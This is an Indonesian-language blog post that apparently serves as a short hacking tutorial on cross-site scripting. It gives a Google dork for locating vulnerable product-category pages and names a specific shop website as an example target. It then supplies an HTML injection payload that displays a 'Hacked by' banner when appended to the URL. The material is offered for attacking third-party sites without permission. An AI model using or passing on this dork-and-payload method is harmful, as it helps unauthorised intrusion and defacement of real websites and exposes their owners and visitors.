XSS atau kepanjangan dari Cross Site Scripting
merupakan teknik Hacking Injeksi Code ( Code Injection Attack ), yaitu seorang
attacker menginjeksi atau memasukan kode ke HTML atau JavaScript, DLL
selanjutnya akan di eksekusi oleh client.
Dork: inurl:"/showcatrows.php?CategoryID="
Gunakan dork diatas untuk mencari target di google.
Misal disini kita menemukan target yaitu
http://www.vcm-shop.com/showcatrows.php?CategoryID=12
Maka tambahkan exploit atau scriptnya
"><marquee><h1>Hacked by
d0rkc0d3</h1></marquee> dibelakang URL.
Postingan
0 komentar:
Posting Komentar